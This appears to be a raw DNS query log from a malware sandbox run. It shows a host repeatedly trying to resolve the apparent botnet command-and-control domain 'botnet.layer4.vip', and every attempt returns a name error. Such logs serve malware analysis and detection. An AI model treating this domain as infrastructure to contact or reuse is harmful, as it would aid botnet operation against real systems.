                                  Apr 9, 2023 03:30:55.471122980 CEST8.8.8.8192.168.2.230x2ec2Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:55.495227098 CEST8.8.8.8192.168.2.230x2ec2Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:55.511324883 CEST8.8.8.8192.168.2.230x1adcName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:55.526855946 CEST8.8.8.8192.168.2.230x1adcName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:55.542484045 CEST8.8.8.8192.168.2.230x1adcName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:55.566760063 CEST8.8.8.8192.168.2.230x1adcName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:55.590931892 CEST8.8.8.8192.168.2.230x1adcName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:55.615268946 CEST8.8.8.8192.168.2.230x35f4Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:55.639400005 CEST8.8.8.8192.168.2.230x35f4Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:55.655355930 CEST8.8.8.8192.168.2.230x35f4Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:55.671081066 CEST8.8.8.8192.168.2.230x35f4Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:55.695574045 CEST8.8.8.8192.168.2.230x35f4Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:55.720312119 CEST8.8.8.8192.168.2.230x4311Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:55.736427069 CEST8.8.8.8192.168.2.230x4311Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:55.752465010 CEST8.8.8.8192.168.2.230x4311Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:55.777108908 CEST8.8.8.8192.168.2.230x4311Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:55.801563978 CEST8.8.8.8192.168.2.230x4311Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:55.826257944 CEST8.8.8.8192.168.2.230x3f5bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:55.841892004 CEST8.8.8.8192.168.2.230x3f5bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:55.866534948 CEST8.8.8.8192.168.2.230x3f5bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:55.882508993 CEST8.8.8.8192.168.2.230x3f5bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:55.906709909 CEST8.8.8.8192.168.2.230x3f5bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:55.922806978 CEST8.8.8.8192.168.2.230x430dName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:55.938410997 CEST8.8.8.8192.168.2.230x430dName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:55.962938070 CEST8.8.8.8192.168.2.230x430dName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:55.978864908 CEST8.8.8.8192.168.2.230x430dName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:56.003313065 CEST8.8.8.8192.168.2.230x430dName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:56.019373894 CEST8.8.8.8192.168.2.230x5338Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:56.035207987 CEST8.8.8.8192.168.2.230x5338Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:56.059689999 CEST8.8.8.8192.168.2.230x5338Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:56.084116936 CEST8.8.8.8192.168.2.230x5338Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:56.099873066 CEST8.8.8.8192.168.2.230x5338Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:56.123965979 CEST8.8.8.8192.168.2.230xadfbName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:56.148288965 CEST8.8.8.8192.168.2.230xadfbName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:56.164118052 CEST8.8.8.8192.168.2.230xadfbName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:56.188374996 CEST8.8.8.8192.168.2.230xadfbName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:56.204129934 CEST8.8.8.8192.168.2.230xadfbName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:56.219954967 CEST8.8.8.8192.168.2.230x82d6Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:56.244108915 CEST8.8.8.8192.168.2.230x82d6Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:56.259927988 CEST8.8.8.8192.168.2.230x82d6Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:56.277961016 CEST8.8.8.8192.168.2.230x82d6Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:56.303179026 CEST8.8.8.8192.168.2.230x82d6Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:56.319248915 CEST8.8.8.8192.168.2.230x787dName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:56.343381882 CEST8.8.8.8192.168.2.230x787dName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:56.359246016 CEST8.8.8.8192.168.2.230x787dName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:56.374938011 CEST8.8.8.8192.168.2.230x787dName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:56.399008989 CEST8.8.8.8192.168.2.230x787dName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:56.423329115 CEST8.8.8.8192.168.2.230x50e1Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:56.439228058 CEST8.8.8.8192.168.2.230x50e1Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:56.454746962 CEST8.8.8.8192.168.2.230x50e1Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:56.479182005 CEST8.8.8.8192.168.2.230x50e1Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:56.494736910 CEST8.8.8.8192.168.2.230x50e1Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:56.519217014 CEST8.8.8.8192.168.2.230xd5deName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:56.543452024 CEST8.8.8.8192.168.2.230xd5deName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:56.567914009 CEST8.8.8.8192.168.2.230xd5deName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:56.583980083 CEST8.8.8.8192.168.2.230xd5deName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:56.608401060 CEST8.8.8.8192.168.2.230xd5deName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:56.633339882 CEST8.8.8.8192.168.2.230xf07eName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:56.657620907 CEST8.8.8.8192.168.2.230xf07eName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:56.682254076 CEST8.8.8.8192.168.2.230xf07eName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:56.707001925 CEST8.8.8.8192.168.2.230xf07eName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:56.731570005 CEST8.8.8.8192.168.2.230xf07eName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:56.756218910 CEST8.8.8.8192.168.2.230xc8bbName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:56.772571087 CEST8.8.8.8192.168.2.230xc8bbName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:56.788506031 CEST8.8.8.8192.168.2.230xc8bbName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:56.804328918 CEST8.8.8.8192.168.2.230xc8bbName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:56.820249081 CEST8.8.8.8192.168.2.230xc8bbName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:56.844702959 CEST8.8.8.8192.168.2.230x1ce7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:56.869191885 CEST8.8.8.8192.168.2.230x1ce7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:56.885452986 CEST8.8.8.8192.168.2.230x1ce7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:56.901316881 CEST8.8.8.8192.168.2.230x1ce7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:56.925740004 CEST8.8.8.8192.168.2.230x1ce7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:56.941792965 CEST8.8.8.8192.168.2.230xb590Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:56.966475010 CEST8.8.8.8192.168.2.230xb590Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:56.982521057 CEST8.8.8.8192.168.2.230xb590Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:56.998167038 CEST8.8.8.8192.168.2.230xb590Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:57.014266968 CEST8.8.8.8192.168.2.230xb590Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:57.038832903 CEST8.8.8.8192.168.2.230xa633Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:57.054584980 CEST8.8.8.8192.168.2.230xa633Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:57.070408106 CEST8.8.8.8192.168.2.230xa633Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:57.095110893 CEST8.8.8.8192.168.2.230xa633Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:57.119288921 CEST8.8.8.8192.168.2.230xa633Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:57.135056973 CEST8.8.8.8192.168.2.230x3610Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:57.150779009 CEST8.8.8.8192.168.2.230x3610Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:57.174967051 CEST8.8.8.8192.168.2.230x3610Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:57.199194908 CEST8.8.8.8192.168.2.230x3610Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:57.215208054 CEST8.8.8.8192.168.2.230x3610Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:57.231355906 CEST8.8.8.8192.168.2.230xc32bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:57.247045040 CEST8.8.8.8192.168.2.230xc32bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:57.271509886 CEST8.8.8.8192.168.2.230xc32bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:57.295943022 CEST8.8.8.8192.168.2.230xc32bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:57.311913013 CEST8.8.8.8192.168.2.230xc32bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:57.327924967 CEST8.8.8.8192.168.2.230x1883Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:57.343601942 CEST8.8.8.8192.168.2.230x1883Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:57.359097004 CEST8.8.8.8192.168.2.230x1883Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:57.374743938 CEST8.8.8.8192.168.2.230x1883Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:57.399226904 CEST8.8.8.8192.168.2.230x1883Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:57.415352106 CEST8.8.8.8192.168.2.230xac88Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:57.431391954 CEST8.8.8.8192.168.2.230xac88Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:57.456168890 CEST8.8.8.8192.168.2.230xac88Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:57.471782923 CEST8.8.8.8192.168.2.230xac88Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:57.487737894 CEST8.8.8.8192.168.2.230xac88Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:57.503772020 CEST8.8.8.8192.168.2.230xd8b1Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:57.528476000 CEST8.8.8.8192.168.2.230xd8b1Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:57.552798986 CEST8.8.8.8192.168.2.230xd8b1Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:57.568541050 CEST8.8.8.8192.168.2.230xd8b1Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:57.593012094 CEST8.8.8.8192.168.2.230xd8b1Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:57.617337942 CEST8.8.8.8192.168.2.230xc94bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:57.641587019 CEST8.8.8.8192.168.2.230xc94bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:57.657557011 CEST8.8.8.8192.168.2.230xc94bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:57.681879997 CEST8.8.8.8192.168.2.230xc94bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:57.706526995 CEST8.8.8.8192.168.2.230xc94bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:57.722609997 CEST8.8.8.8192.168.2.230xa670Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:57.738533020 CEST8.8.8.8192.168.2.230xa670Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:57.754579067 CEST8.8.8.8192.168.2.230xa670Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:57.778773069 CEST8.8.8.8192.168.2.230xa670Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:57.794521093 CEST8.8.8.8192.168.2.230xa670Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:57.819314003 CEST8.8.8.8192.168.2.230x6003Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:57.843581915 CEST8.8.8.8192.168.2.230x6003Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:57.859263897 CEST8.8.8.8192.168.2.230x6003Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:57.883567095 CEST8.8.8.8192.168.2.230x6003Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:57.908178091 CEST8.8.8.8192.168.2.230x6003Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:57.932544947 CEST8.8.8.8192.168.2.230xcd2Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:57.948040962 CEST8.8.8.8192.168.2.230xcd2Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:57.972537994 CEST8.8.8.8192.168.2.230xcd2Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:57.997045994 CEST8.8.8.8192.168.2.230xcd2Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:58.021579027 CEST8.8.8.8192.168.2.230xcd2Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:58.046175957 CEST8.8.8.8192.168.2.230x799eName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:58.070775032 CEST8.8.8.8192.168.2.230x799eName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:58.095263004 CEST8.8.8.8192.168.2.230x799eName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:58.110678911 CEST8.8.8.8192.168.2.230x799eName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:58.134567976 CEST8.8.8.8192.168.2.230x799eName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:58.150239944 CEST8.8.8.8192.168.2.230xc3c8Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:58.165770054 CEST8.8.8.8192.168.2.230xc3c8Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:58.181607962 CEST8.8.8.8192.168.2.230xc3c8Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:58.197120905 CEST8.8.8.8192.168.2.230xc3c8Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:58.221616030 CEST8.8.8.8192.168.2.230xc3c8Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:58.246099949 CEST8.8.8.8192.168.2.230x5d95Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:58.261893034 CEST8.8.8.8192.168.2.230x5d95Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:58.286384106 CEST8.8.8.8192.168.2.230x5d95Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:58.310451031 CEST8.8.8.8192.168.2.230x5d95Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:58.334527969 CEST8.8.8.8192.168.2.230x5d95Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:58.359220982 CEST8.8.8.8192.168.2.230x5be4Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:58.383414030 CEST8.8.8.8192.168.2.230x5be4Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:58.407988071 CEST8.8.8.8192.168.2.230x5be4Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:58.423655987 CEST8.8.8.8192.168.2.230x5be4Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:58.447844982 CEST8.8.8.8192.168.2.230x5be4Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:58.463843107 CEST8.8.8.8192.168.2.230x5e7cName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:58.488382101 CEST8.8.8.8192.168.2.230x5e7cName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:58.512552023 CEST8.8.8.8192.168.2.230x5e7cName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:58.528413057 CEST8.8.8.8192.168.2.230x5e7cName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:58.544255972 CEST8.8.8.8192.168.2.230x5e7cName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:58.568587065 CEST8.8.8.8192.168.2.230xd5efName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:58.584564924 CEST8.8.8.8192.168.2.230xd5efName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:58.608787060 CEST8.8.8.8192.168.2.230xd5efName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:58.624381065 CEST8.8.8.8192.168.2.230xd5efName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:58.640300989 CEST8.8.8.8192.168.2.230xd5efName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:58.656260967 CEST8.8.8.8192.168.2.230xd590Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:58.680480003 CEST8.8.8.8192.168.2.230xd590Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:58.696571112 CEST8.8.8.8192.168.2.230xd590Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:58.712529898 CEST8.8.8.8192.168.2.230xd590Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:58.736674070 CEST8.8.8.8192.168.2.230xd590Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:58.752717972 CEST8.8.8.8192.168.2.230x838Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:58.768512964 CEST8.8.8.8192.168.2.230x838Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:58.784475088 CEST8.8.8.8192.168.2.230x838Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:58.800494909 CEST8.8.8.8192.168.2.230x838Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:58.824806929 CEST8.8.8.8192.168.2.230x838Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:58.849404097 CEST8.8.8.8192.168.2.230xb965Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:58.865350962 CEST8.8.8.8192.168.2.230xb965Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:58.881145000 CEST8.8.8.8192.168.2.230xb965Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:58.896934986 CEST8.8.8.8192.168.2.230xb965Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:58.912404060 CEST8.8.8.8192.168.2.230xb965Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:58.937067986 CEST8.8.8.8192.168.2.230xe605Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:58.952981949 CEST8.8.8.8192.168.2.230xe605Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:58.977180958 CEST8.8.8.8192.168.2.230xe605Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:58.993129015 CEST8.8.8.8192.168.2.230xe605Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:59.009175062 CEST8.8.8.8192.168.2.230xe605Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:59.033772945 CEST8.8.8.8192.168.2.230x21acName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:59.057873011 CEST8.8.8.8192.168.2.230x21acName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:59.082283974 CEST8.8.8.8192.168.2.230x21acName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:59.098123074 CEST8.8.8.8192.168.2.230x21acName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:59.114032030 CEST8.8.8.8192.168.2.230x21acName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:59.129753113 CEST8.8.8.8192.168.2.230x3f8cName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:59.145193100 CEST8.8.8.8192.168.2.230x3f8cName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:59.169527054 CEST8.8.8.8192.168.2.230x3f8cName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:59.194032907 CEST8.8.8.8192.168.2.230x3f8cName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
